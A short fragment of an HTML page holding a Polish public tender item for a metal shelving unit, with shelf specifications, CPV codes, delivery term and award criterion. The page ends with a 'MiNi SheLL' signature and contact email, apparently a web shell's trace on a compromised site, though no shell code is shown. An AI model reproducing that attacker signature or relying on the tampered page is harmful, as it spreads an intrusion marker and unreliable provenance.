4	REGAŁ METALOWY NR 2-REGAŁ METALOWY- PÓŁKI O GŁĘBOKOŚCI OD 400 DO 1000 mm - KONSTRUKCJA ZACZEPOWA - PÓŁKI Z BLACHY OCYNKOWANEJ - WZMOCNIENIE POPRZECZNE I WZDŁUŻNE - MOCOWANIE PÓŁEK CO 25 mm 
- NOŚNOŚĆ PÓŁEK 100 kg - STĘŻENIE ZWIĘKSZAJĄCE STATECZNOŚĆ REGAŁU, 
- WZMOCNIENIE BOCZNE-12szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com